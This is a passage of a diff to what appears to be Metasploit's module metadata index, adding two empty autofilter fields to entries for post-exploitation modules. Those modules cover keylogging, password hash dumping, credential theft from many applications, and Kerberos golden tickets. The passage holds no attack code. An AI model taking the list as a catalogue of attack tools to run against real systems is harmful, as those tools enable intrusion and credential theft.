"/modules/post/multi/manage/system_session.rb", @@ -117186,6 +146331,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-26 19:29:46 +0000", "path": "/modules/post/multi/manage/upload_exec.rb", @@ -117215,6 +146362,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/zip.rb", @@ -117245,6 +146394,8 @@ "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 04:41:58 +0000", "path": "/modules/post/multi/recon/local_exploit_suggester.rb", @@ -117274,6 +146425,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", @@ -117303,6 +146456,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-25 04:20:25 +0000", "path": "/modules/post/multi/recon/sudo_commands.rb", @@ -117332,6 +146487,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/admin/say.rb", @@ -117361,6 +146518,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-28 15:56:56 +0000", "path": "/modules/post/osx/capture/keylog_recorder.rb", @@ -117390,6 +146549,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/capture/screen.rb", @@ -117421,6 +146582,8 @@ "platform": "OSX", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-18 14:22:32 +0000", "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", @@ -117450,6 +146613,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-22 22:25:39 +0000", "path": "/modules/post/osx/gather/autologin_password.rb", @@ -117479,6 +146644,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_adium.rb", @@ -117508,6 +146675,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_airport.rb", @@ -117537,6 +146706,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", @@ -117566,6 +146737,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_colloquy.rb", @@ -117596,6 +146769,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/enum_keychain.rb", @@ -117625,6 +146800,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_messages.rb", @@ -117654,6 +146831,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-22 22:25:39 +0000", "path": "/modules/post/osx/gather/enum_osx.rb", @@ -117685,6 +146864,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-24 22:17:58 +0000", "path": "/modules/post/osx/gather/hashdump.rb", @@ -117716,6 +146897,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/password_prompt_spoof.rb", @@ -117745,6 +146928,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/safari_lastsession.rb", @@ -117775,6 +146960,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/mount_share.rb", @@ -117804,6 +146991,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/record_mic.rb", @@ -117833,6 +147022,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/vpn.rb", @@ -117862,6 +147053,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/webcam.rb", @@ -117896,6 +147089,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 20:54:41 +0000", "path": "/modules/post/solaris/escalate/srsexec_readline.rb", @@ -117925,6 +147120,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/solaris/gather/checkvm.rb", @@ -117954,6 +147151,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/enum_packages.rb", @@ -117983,6 +147182,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/enum_services.rb", @@ -118012,6 +147213,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/hashdump.rb", @@ -118042,6 +147245,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/capture/keylog_recorder.rb", @@ -118072,6 +147277,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/capture/lockout_keylogger.rb", @@ -118101,6 +147308,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/droplnk.rb", @@ -118130,6 +147339,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/getsystem.rb", @@ -118159,6 +147370,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-27 15:36:41 +0000", "path": "/modules/post/windows/escalate/golden_ticket.rb", @@ -118193,6 +147406,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", @@ -118223,6 +147438,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/screen_unlock.rb", @@ -118252,6 +147469,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/ad_to_sqlite.rb", @@ -118281,6 +147500,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/arp_scanner.rb", @@ -118311,6 +147532,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/bitcoin_jacker.rb", @@ -118341,6 +147564,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/bitlocker_fvek.rb", @@ -118371,6 +147596,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/cachedump.rb", @@ -118401,6 +147628,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-17 16:41:21 +0000", "path": "/modules/post/windows/gather/checkvm.rb", @@ -118430,6 +147659,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/avira_password.rb", @@ -118459,6 +147690,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", @@ -118488,6 +147721,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/coreftp.rb", @@ -118517,6 +147752,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/credential_collector.rb", @@ -118546,6 +147783,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-15 14:06:36 +0000", "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", @@ -118578,6 +147817,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", @@ -118608,6 +147849,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/dyndns.rb", @@ -118637,6 +147880,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", @@ -118666,6 +147911,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_laps.rb", @@ -118696,6 +147943,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", @@ -118725,6 +147974,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/epo_sql.rb", @@ -118755,6 +148006,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", @@ -118784,6 +148037,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/credentials/flashfxp.rb", @@ -118813,6 +148068,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", @@ -118842,6 +148099,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/ftpx.rb", @@ -118879,6 +148138,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:04:22 +0000", "path": "/modules/post/windows/gather/credentials/gpp.rb", @@ -118908,6 +148169,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/heidisql.rb", @@ -118938,6 +148201,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/idm.rb", @@ -118967,6 +148232,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/imail.rb", @@ -118996,6 +148263,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/imvu.rb", @@ -119026,6 +148295,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", @@ -119055,6 +148326,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-20 18:24:41 +0000", "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", @@ -119085,6 +148358,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/meebo.rb", @@ -119116,6 +148391,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:14:38 +0000", "path": "/modules/post/windows/gather/credentials/mremote.rb", @@ -119146,6 +148423,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", @@ -119176,6 +148455,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", @@ -119205,6 +148486,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/outlook.rb", @@ -119237,6 +148520,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", @@ -119267,6 +148552,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/razorsql.rb", @@ -119296,6 +148583,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", @@ -119328,6 +148617,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/skype.rb", @@ -119359,6 +148650,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/smartermail.rb", @@ -119388,6 +148681,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 15:57:09 +0000", "path": "/modules/post/windows/gather/credentials/smartftp.rb", @@ -119418,6 +148713,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/spark_im.rb", @@ -119447,6 +148744,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/sso.rb", @@ -119476,6 +148775,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/steam.rb", @@ -119505,6 +148806,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", @@ -119534,6 +148837,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/total_commander.rb", @@ -119564,6 +148869,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/trillian.rb", @@ -119594,6 +148901,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/vnc.rb", @@ -119624,6 +148933,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", @@ -119653,6 +148964,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/winscp.rb", @@ -119682,6 +148995,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", @@ -119711,6 +149026,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/dnscache_dump.rb", @@ -119740,6 +149057,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/dumplinks.rb", @@ -119769,6 +149088,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", @@ -119798,6 +149119,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_computers.rb", @@ -119827,6 +149150,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_groups.rb", @@ -119856,6 +149181,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", @@ -119886,6 +149213,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb", @@ -119915,6 +149244,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", @@ -119944,6 +149275,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", @@ -119975,6 +149308,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_users.rb", @@ -120004,6 +149339,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_applications.rb", @@ -120033,6 +149370,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_artifacts.rb", @@ -120063,6 +149402,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_av_excluded.rb", @@ -120095,6 +149436,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-27 07:41:06 +0000", "path": "/modules/post/windows/gather/enum_chrome.rb", @@ -120124,6 +149467,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_computers.rb", @@ -120154,6 +149499,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_db.rb", @@ -120183,6 +149530,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_devices.rb", @@ -120214,6 +149563,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_dirperms.rb", @@ -120243,6 +149594,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain.rb", @@ -120273,6 +149626,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain_group_users.rb", @@ -120302,6 +149657,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain_tokens.rb", @@ -120332,6 +149689,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/enum_domain_users.rb", @@ -120361,6 +149720,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domains.rb", @@ -120390,6 +149751,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_emet.rb", @@ -120420,6 +149783,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_files.rb", @@ -120449,6 +149814,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_hostfile.rb", @@ -120478,6 +149845,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ie.rb", @@ -120507,6 +149876,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_logged_on_users.rb", @@ -120536,6 +149907,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-24 16:06:55 +0000", "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", @@ -120565,6 +149938,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_muicache.rb", @@ -120595,6 +149970,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_patches.rb", @@ -120624,6 +150001,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_powershell_env.rb", @@ -120653,6 +150032,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_prefetch.rb", @@ -120682,6 +150063,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_proxy.rb", @@ -120711,6 +150094,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", @@ -120741,6 +150126,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_services.rb", @@ -120770,6 +150157,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_shares.rb", @@ -120800,6 +150189,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": 